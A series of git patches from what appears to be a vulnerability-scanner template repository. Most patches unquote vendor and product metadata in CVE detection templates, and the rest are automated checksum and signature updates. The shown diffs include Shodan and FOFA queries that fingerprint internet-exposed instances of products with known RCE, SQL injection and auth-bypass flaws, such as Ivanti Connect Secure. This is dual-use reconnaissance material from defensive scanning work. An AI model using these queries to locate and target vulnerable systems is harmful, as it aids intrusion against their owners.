'http/exposed-panels/ackee-panel.yaml' - - 'http/exposed-panels/craftercms-panel.yaml' - - 'http/exposed-panels/easyvista-panel.yaml' - - 'http/exposed-panels/fortinet/f5-next-central-manager.yaml' - - 'http/exposed-panels/ghost-panel.yaml' - - 'http/exposed-panels/matomo-panel.yaml' - - 'http/exposed-panels/microfocus-lifecycle-panel.yaml' - - 'http/exposed-panels/n8n-panel.yaml' - - 'http/exposed-panels/nocodb-panel.yaml' - - 'http/exposed-panels/oracle-ebusiness-panel.yaml' - - 'http/exposed-panels/pocketbase-panel.yaml' - - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - - 'http/exposed-panels/tiny-rss-panel.yaml' - - 'http/exposed-panels/unleash-panel.yaml' - - 'http/honeypot/tpot-honeypot-detect.yaml' - - 'http/misconfiguration/imgproxy-unauth.yaml' - - 'http/misconfiguration/installer/custom-xoops-installer.yaml' - - 'http/misconfiguration/installer/easy-viserlabs-installer.yaml' - - 'http/misconfiguration/installer/forgejo-installer.yaml' - - 'http/misconfiguration/installer/froxlor-installer.yaml' - - 'http/misconfiguration/installer/growi-installer.yaml' - - 'http/misconfiguration/installer/ids-skills-installer.yaml' - - 'http/misconfiguration/installer/moosocial-installer.yaml' - - 'http/misconfiguration/installer/octoprint-installer.yaml' - - 'http/misconfiguration/installer/openfire-setup.yaml' - - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - - 'http/misconfiguration/installer/qloapps-installer.yaml' - - 'http/misconfiguration/installer/trilium-notes-installer.yaml' - - 'http/misconfiguration/installer/wiki-js-installer.yaml' - - 'http/misconfiguration/installer/xbackbone-installer.yaml' - - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - - 'http/technologies/apache/apache-answer-detect.yaml' - - 'http/technologies/boa-web-server.yaml' - - 'http/technologies/craftercms-detect.yaml' - - 'http/technologies/imgproxy-detect.yaml' - - 'http/technologies/meilisearch-detect.yaml' - - 'http/technologies/microfocus-iprint-detect.yaml' - - 'http/technologies/statamic-detect.yaml' - - 'http/technologies/tinyproxy-detect.yaml' - - 'http/technologies/uni-gui-framework.yaml' - - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' - - 'http/vulnerabilities/other/castel-digital-sqli.yaml' - - 'http/vulnerabilities/other/tendat-credential.yaml' - - 'javascript/enumeration/checkpoint-firewall-enum.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 63364a86972e1e62ac8e895aca963bcae3cd2285 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Fri, 24 May 2024 03:00:30 +0530 Subject: [PATCH 1275/1768] Update CVE-2022-41473.yaml --- http/cves/2022/CVE-2022-41473.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 487d6d487a..9b99471bec 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -27,10 +27,10 @@ info: metadata: verified: true max-request: 1 - vendor: 'rpcms' - product: 'rpcms' + vendor: rpcms + product: rpcms shodan-query: http.html:"RPCMS" - tags: cve,cve2022,rpcms,xss,'rpcms' + tags: cve,cve2022,rpcms,xss,rpcms http: - method: GET @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950 From 0226a3d8a92bd9817963239b2ff77119cc674265 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:31:50 +0000 Subject: [PATCH 1277/1768] Auto Generated Templates Checksum [Thu May 23 21:31:50 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5b3a981cb1..111cbede54 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2792,7 +2792,7 @@ http/cves/2022/CVE-2022-4117.yaml:1e44f0c7ce464548cf7a8ff5c714866891b81a12 http/cves/2022/CVE-2022-4140.yaml:f243423772b8b2e9cfb6a9a3d8e4bbbbab68b2c9 http/cves/2022/CVE-2022-41412.yaml:897d78be653f3c09f28e027006285ca2dfd67d8d http/cves/2022/CVE-2022-41441.yaml:53548507ba14aae755885a74642e9df3ac4b35e7 -http/cves/2022/CVE-2022-41473.yaml:d01744a230fae1f94045d8821eceab99821f1b0a +http/cves/2022/CVE-2022-41473.yaml:3494e5c8590cb8ef169e2973afbf8deff741d211 http/cves/2022/CVE-2022-41840.yaml:a55753333818330dd5ac198655530d2755a3a239 http/cves/2022/CVE-2022-42094.yaml:22cbf742c665310adc7ced1dd3f87664b96b4115 http/cves/2022/CVE-2022-42095.yaml:2a39087a4ed951945354f872a56e60599e8c0441 @@ -8558,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f76730f65e4d627ae142d78aa0957f81a49e38f7 +templates-checksum.txt:6420a1252dee0cec7f0bc324c0be825086313c5e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a4eeec20688840987af6c31bd9f4c3c2861dfe43 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Fri, 24 May 2024 03:02:02 +0530 Subject: [PATCH 1278/1768] Update CVE-2022-0864.yaml --- http/cves/2022/CVE-2022-0864.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2022/CVE-2022-0864.yaml b/http/cves/2022/CVE-2022-0864.yaml index 7677e5849e..8ee0a1a01f 100644 --- a/http/cves/2022/CVE-2022-0864.yaml +++ b/http/cves/2022/CVE-2022-0864.yaml @@ -26,10 +26,10 @@ info: metadata: verified: true max-request: 2 - vendor: 'updraftplus' - product: 'updraftplus' + vendor: updraftplus + product: updraftplus framework: wordpress - tags: cve,cve2022,xss,authenticated,updraftplus,wpscan,wp-plugin,wp,wordpress,'updraftplus' + tags: cve,cve2022,xss,authenticated,updraftplus,wpscan,wp-plugin,wp,wordpress,updraftplus http: - raw: @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022034be4400ddd11bead7863e54de04f23d1c17f928aef2720f6a7c9b4d234581b2022001f7f119d81ac51ef899efc1106ad966682323a96b57947df36030ff8300e7d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034be4400ddd11bead7863e54de04f23d1c17f928aef2720f6a7c9b4d234581b2022001f7f119d81ac51ef899efc1106ad966682323a96b57947df36030ff8300e7d5:922c64590222798bb761d5b6d8e72950 From 4030bd05c372762fb209390aa61f42ec2e76e6cd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:32:49 +0000 Subject: [PATCH 1280/1768] Auto Generated Templates Checksum [Thu May 23 21:32:49 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 111cbede54..0f2f691cf8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2467,7 +2467,7 @@ http/cves/2022/CVE-2022-0824.yaml:834df363f2d408a096b0e7c39a96f875659e99df http/cves/2022/CVE-2022-0826.yaml:c968716c056d8bac29c828f6de28d91fe05c9131 http/cves/2022/CVE-2022-0827.yaml:08336164d26872a6cc676046ef7a1e26af4d1d30 http/cves/2022/CVE-2022-0846.yaml:f79dd734e1a26b052d0e36f9492518e49c90678c -http/cves/2022/CVE-2022-0864.yaml:6498b656c91969541eb6dfd33c23a44273abf196 +http/cves/2022/CVE-2022-0864.yaml:1a6baf788487f6ebf716823b6c3191ef8da02348 http/cves/2022/CVE-2022-0867.yaml:6e863875d948eb2710e1bd9f80b30a8a4a84e1ce http/cves/2022/CVE-2022-0869.yaml:eac3f6cb08a6fde39633b57380547f077d31f125 http/cves/2022/CVE-2022-0870.yaml:50d1fffb2a551f946af8743ee205f95504659338 @@ -8558,7 +8558,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6420a1252dee0cec7f0bc324c0be825086313c5e +templates-checksum.txt:1045900bb85fc3bb0daae2fa73e5aefe3e652e8f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f136a40ad93d6408410c298580351460e365785d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:33:35 +0000 Subject: [PATCH 1281/1768] Auto Template Signing [Thu May 23 21:33:35 UTC 2024] :robot: --- http/cves/2022/CVE-2022-41473.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 9b99471bec..bfd1a094ab 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022059710e3756b18a7a2e6049fda0d5f4cfbbfbccea1f551f4070f781ae489fd40702201464c4ea707b48789fb3cefb06228c1cd8d5cf08174c84ef530dea45bd1cd0b3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f8b489e0526233fadc0b71daa6165ce5043a99bcc11cfb0efec40a01d0adb68e022100c10051f21c0b7d95b703834dd555ff205cff4cd72e743f60787f628f9800bb44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fb545389e31133e3fedb0130ed08e7c51d78de91 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Fri, 24 May 2024 03:15:20 +0530 Subject: [PATCH 1282/1768] fix queries --- http/cves/2018/CVE-2018-0127.yaml | 2 +- http/cves/2018/CVE-2018-16671.yaml | 2 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2021/CVE-2021-24849.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-32682.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 4 ++-- http/cves/2022/CVE-2022-24124.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-32315.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 2 +- http/cves/2023/CVE-2023-46805.yaml | 2 +- http/cves/2023/CVE-2023-6895.yaml | 2 +- http/cves/2024/CVE-2024-21887.yaml | 2 +- http/cves/2024/CVE-2024-21893.yaml | 2 +- http/cves/2024/CVE-2024-22024.yaml | 2 +- 19 files changed, 20 insertions(+), 20 deletions(-) diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index ffcab418a6..732fbc9eb4 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -24,7 +24,7 @@ info: cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: "cisco" + vendor: cisco product: rv132w_firmware tags: cve,cve2018,cisco,router diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 66bf5e553e..18b2d6a8e9 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -25,7 +25,7 @@ info: cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: "circontrol" + vendor: circontrol product: circarlife_scada tags: cve2018,cve,iot,disclosure,edb,circarlife,scada,circontrol diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 8218daf197..b9ad011458 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -26,7 +26,7 @@ info: metadata: max-request: 1 vendor: elastic - product: "kibana" + product: kibana tags: cve,cve2018,lfi,kibana,vulhub,elastic http: diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 8643df9cae..cc2e60bd10 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -27,7 +27,7 @@ info: verified: true max-request: 3 vendor: paessler - product: "prtg_network_monitor" + product: prtg_network_monitor shodan-query: title:"prtg" tags: cve2020,cve,prtg,disclosure,paessler diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index 8709514ac1..e4516b072b 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 3 vendor: wclovers - product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible" + product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible framework: wordpress publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace" tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index dc6449f51e..0489b4de45 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -24,7 +24,7 @@ info: metadata: max-request: 1 vendor: saltstack - product: "salt" + product: salt tags: cve,cve2021,saltapi,rce,saltstack,unauth http: diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index fb0446244f..19c5820323 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -25,7 +25,7 @@ info: cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: "seopanel" + vendor: seopanel product: seo_panel tags: cve2021,cve,seopanel,xss diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index b684490a1e..ac86cf9c30 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -25,7 +25,7 @@ info: metadata: max-request: 9 vendor: std42 - product: "elfinder" + product: elfinder github: https://github.com/Studio-42/elFinder tags: cve2021,cve,elfinder,misconfig,rce,oss,std42 diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 6de3ff1b9c..503b8f7ace 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -24,8 +24,8 @@ info: cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* metadata: max-request: 2 - vendor: "redash" - product: "redash" + vendor: redash + product: redash shodan-query: http.favicon.hash:698624197 tags: cve2021,cve,hackerone,redash,auth-bypass diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index dfd0bce904..bf89028ef1 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -26,7 +26,7 @@ info: metadata: max-request: 1 vendor: casbin - product: "casdoor" + product: casdoor shodan-query: http.title:"Casdoor" tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index 63542941b5..cbf14d6f72 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -27,7 +27,7 @@ info: metadata: verified: true max-request: 1 - vendor: "adobe" + vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" tags: cve2023,cve,packetstorm,adobe,coldfusion,lfi,kev diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 09f5e90b4f..53bdc464b9 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -26,7 +26,7 @@ info: metadata: max-request: 2 vendor: codemenschen - product: "gift_vouchers" + product: gift_vouchers framework: wordpress fofa-query: "body=\"/wp-content/plugins/gift-voucher/\"" tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 11bb3d3bb4..73b4aef3a0 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -28,7 +28,7 @@ info: verified: true max-request: 1 vendor: igniterealtime - product: "openfire" + product: openfire shodan-query: title:"openfire" tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 4e12ddae19..caf93a901a 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -28,7 +28,7 @@ info: verified: true max-request: 1 vendor: gibbonedu - product: "gibbon" + product: gibbon shodan-query: http.favicon.hash:-165631681 fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,lfi,gibbonedu diff --git a/http/cves/2023/CVE-2023-46805.yaml b/http/cves/2023/CVE-2023-46805.yaml index 9cf94669f8..4fb876ef38 100644 --- a/http/cves/2023/CVE-2023-46805.yaml +++ b/http/cves/2023/CVE-2023-46805.yaml @@ -22,7 +22,7 @@ info: metadata: max-request: 2 vendor: ivanti - product: "connect_secure" + product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2023,kev,auth-bypass,ivanti diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index 21a29b80a6..757d797758 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 2 vendor: hikvision - product: "intercom_broadcast_system" + product: intercom_broadcast_system fofa-query: "icon_hash=\"-1830859634\"" tags: cve,cve2023,hikvision,rce diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index d0ecc2eb4e..0c542dddb3 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -22,7 +22,7 @@ info: metadata: max-request: 1 vendor: ivanti - product: "connect_secure" + product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,kev,rce,ivanti diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 5bacd3dd43..381a5e5c93 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -23,7 +23,7 @@ info: metadata: max-request: 1 vendor: ivanti - product: "connect_secure" + product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,kev,ssrf,ivanti diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index bdfeb11f65..572a2940d4 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -16,7 +16,7 @@ info: metadata: max-request: 1 vendor: ivanti - product: "connect_secure" + product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,xxe,ivanti From 20cea714a93802b7c2788d500ece0eb60231b5c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 21:47:21 +0000 Subject: [PATCH 1284/1768] Auto Generated Templates Checksum [Thu May 23 21:47:21 UTC 2024] :robot: --- templates-checksum.txt | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0f2f691cf8..85abfd4a45 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1372,7 +1372,7 @@ http/cves/2017/CVE-2017-9805.yaml:4fe5223d9747e0cd6872564b8069d1d2074a8fdc http/cves/2017/CVE-2017-9822.yaml:137875cd55de914baf6ad6cca7783b728484715c http/cves/2017/CVE-2017-9833.yaml:c08b62014c13f6adbdf1b39fb6199d35f4df773c http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a -http/cves/2018/CVE-2018-0127.yaml:b45c016b95763662a90197111431384d3c845e21 +http/cves/2018/CVE-2018-0127.yaml:0164997996d5bfeabd4811bb3b48e4d1429e4621 http/cves/2018/CVE-2018-0296.yaml:8f811f713bd26781e42619b8ad3cdc084297b52c http/cves/2018/CVE-2018-1000129.yaml:03328d29e7ad3ec82f00b8de687d940ec9060db9 http/cves/2018/CVE-2018-1000130.yaml:c82881e9663b78ba5b44251f15b4e93555896100 @@ -1448,14 +1448,14 @@ http/cves/2018/CVE-2018-16299.yaml:b020da11f05eaa7a8b9eb2136b09cf8190b0b59c http/cves/2018/CVE-2018-16341.yaml:74ccee29760fe9aaf2616353755ab249f6f6fcfb http/cves/2018/CVE-2018-16668.yaml:48491a4b2add544918c03545451fc5ee424330f3 http/cves/2018/CVE-2018-16670.yaml:c346dc7a3d1df2c12c8f5f1afb69a09c1d785c9a -http/cves/2018/CVE-2018-16671.yaml:64bc8352dc9795148d754ba9dbfb83930917d316 +http/cves/2018/CVE-2018-16671.yaml:b476134832a83699c3f6f6a9cc62fc14afbb2bcf http/cves/2018/CVE-2018-16716.yaml:a1f2d156568e8a37a17de9a2759623c13ba02f41 http/cves/2018/CVE-2018-16761.yaml:dbdf46a59546a320d395c2436fbca07cc9c1be86 http/cves/2018/CVE-2018-16763.yaml:804e34994429a56b36f2447a635c4bdc5dd59a07 http/cves/2018/CVE-2018-16836.yaml:98b608b7b785160c1ca398b8ccf5457933dafcbc http/cves/2018/CVE-2018-16979.yaml:94bde7048fe9f62210ccb11497dbc11e1c3b1c99 http/cves/2018/CVE-2018-17153.yaml:e004a49d22b96f5006592b6000346b3c51b7c321 -http/cves/2018/CVE-2018-17246.yaml:9f7aa278d5520e5d3872ab24cb68dc261ea3a81c +http/cves/2018/CVE-2018-17246.yaml:32adb5762d66a9817fc2a3a1de90400021bf65ab http/cves/2018/CVE-2018-17254.yaml:796bc823bb38f76e61b2c6a7b8d508a6a81a1cb8 http/cves/2018/CVE-2018-17422.yaml:90edc0d3636a6670e628eccc7eea61be4144918b http/cves/2018/CVE-2018-17431.yaml:4f724c2ec11d7e5574b913c8f3d171dc69bf23d6 @@ -1717,7 +1717,7 @@ http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 http/cves/2020/CVE-2020-11530.yaml:e4de2a4e8e617c78ba87fa185790a0495bf0e8da http/cves/2020/CVE-2020-11546.yaml:0028a1adf59ba8524634f55e24652564fc5ce6b5 -http/cves/2020/CVE-2020-11547.yaml:28603cf2bfe7118db8addf09115b1a89a1c6a7a3 +http/cves/2020/CVE-2020-11547.yaml:51718edad043528ebbcde65242c7663b7812948c http/cves/2020/CVE-2020-11710.yaml:c2bde61a09512b2cc4c86a2d7bdaa5e85172896e http/cves/2020/CVE-2020-11738.yaml:4c2e75351d44e91b76d713e865d22f88200e3567 http/cves/2020/CVE-2020-11798.yaml:d9e0f98c88d58160585123f986858af68e699b2e @@ -2076,7 +2076,7 @@ http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 http/cves/2021/CVE-2021-24827.yaml:61c481595a7dabb304fd1c0cec9c7cd6a6a39684 http/cves/2021/CVE-2021-24838.yaml:0cc51d4d1c10c2f4af870aa9b636013be8130a28 -http/cves/2021/CVE-2021-24849.yaml:a2756dc668993fb9ab5897adf3271fe715de94c1 +http/cves/2021/CVE-2021-24849.yaml:0b8d4f84d5bdbcde91094c4d59650386d57abf37 http/cves/2021/CVE-2021-24862.yaml:c12546a4335f7196f4b2813946601c2f74e79cca http/cves/2021/CVE-2021-24875.yaml:af4472bf9db8cc8423ae0c3b0ebe71c3767829bc http/cves/2021/CVE-2021-24891.yaml:d25791df32146893bfb3dc68d5b0175a4a53e2ee @@ -2117,7 +2117,7 @@ http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 http/cves/2021/CVE-2021-25114.yaml:10297fac562f4e9b4758c40509edd8eab28810f1 http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 http/cves/2021/CVE-2021-25120.yaml:180bff131d7b46afe0cbc57424767b9cad725a83 -http/cves/2021/CVE-2021-25281.yaml:c14d857573fa79cb387dfaded5eaf57f0c026169 +http/cves/2021/CVE-2021-25281.yaml:aa1b740e4c902b0387a7a487f99a82e45cc72a4d http/cves/2021/CVE-2021-25296.yaml:eebdd9e01f7de42eac8b0acc73ef7737c22d6dc3 http/cves/2021/CVE-2021-25297.yaml:798c5dd2384ee37d90e12cc73b40dd17203a5e3a http/cves/2021/CVE-2021-25298.yaml:a1bd4f65462afa430f096448b5615192e924dc52 @@ -2182,7 +2182,7 @@ http/cves/2021/CVE-2021-29490.yaml:40b5bea457e707732739b67380abd7976c51f14d http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:79b2ae7f2667471da099f5594f532bbc00626580 http/cves/2021/CVE-2021-29625.yaml:89de3db861b7d733e2ba3aa140262d92187a64c5 -http/cves/2021/CVE-2021-3002.yaml:0efe60964cc119aaf718c504451830e6a5322d7c +http/cves/2021/CVE-2021-3002.yaml:f80274efeea35bf2c073889b5ab76ce619691b69 http/cves/2021/CVE-2021-30049.yaml:da78546d4d231f264cf840eedd0596d543ab9453 http/cves/2021/CVE-2021-30128.yaml:5d3c104ca678614f3c0b970fd3dab9975f35878c http/cves/2021/CVE-2021-30134.yaml:7528c665e9c5128fe999de9ce7b20a371021ae74 @@ -2212,7 +2212,7 @@ http/cves/2021/CVE-2021-32172.yaml:8fdebff02b3d16ee1e990072fd53e435b1e8dac7 http/cves/2021/CVE-2021-3223.yaml:087280fa99bb84c2ea0ee9e446ede3320cfb4923 http/cves/2021/CVE-2021-32305.yaml:70d9951aa4e2a64bd18be918d669dde6a9a18cf2 http/cves/2021/CVE-2021-32618.yaml:1282d29e43f0a00e93a6fceebed1750a42af490f -http/cves/2021/CVE-2021-32682.yaml:c8d43f4eeddb9da520464011c01a7dd17114f90e +http/cves/2021/CVE-2021-32682.yaml:51ca70b0cb3413265ae052b942999f9e3185bfd4 http/cves/2021/CVE-2021-32789.yaml:03bf6b93c36208174b66afb4a806a53868ed54de http/cves/2021/CVE-2021-32819.yaml:380a8078feba8f1bc4e50b118a121f74d6cf25f8 http/cves/2021/CVE-2021-32820.yaml:c8e898d2d63b318200ed63044d0be7334a2e6f1b @@ -2312,7 +2312,7 @@ http/cves/2021/CVE-2021-40972.yaml:d27431d64ba53011509e840670cc2119f4dc6be9 http/cves/2021/CVE-2021-40973.yaml:e4beb729c195766e7d1b9460eb88a622e2780258 http/cves/2021/CVE-2021-40978.yaml:62ebc40431004d08ba54cf76229e706d2402c44a http/cves/2021/CVE-2021-41174.yaml:4c24cd07dea7803624fb8d4cfa46b618c024d961 -http/cves/2021/CVE-2021-41192.yaml:aa6434af889315daa1b956bd649a67c51abea63a +http/cves/2021/CVE-2021-41192.yaml:429f7fe2a345a9b2aafffe5d8876b9461813840d http/cves/2021/CVE-2021-41266.yaml:8d081cc6e83f9e2b3397e60a81a16ec1a281b930 http/cves/2021/CVE-2021-41277.yaml:8fda77b1487c28d680cc2eae21e04c291c2a660d http/cves/2021/CVE-2021-41282.yaml:40c118c32ea07c6cbfab601a6e9c7999dd44ac79 @@ -2560,7 +2560,7 @@ http/cves/2022/CVE-2022-23881.yaml:af0d94cea1d7840f3800ea02e4e602cf960d2530 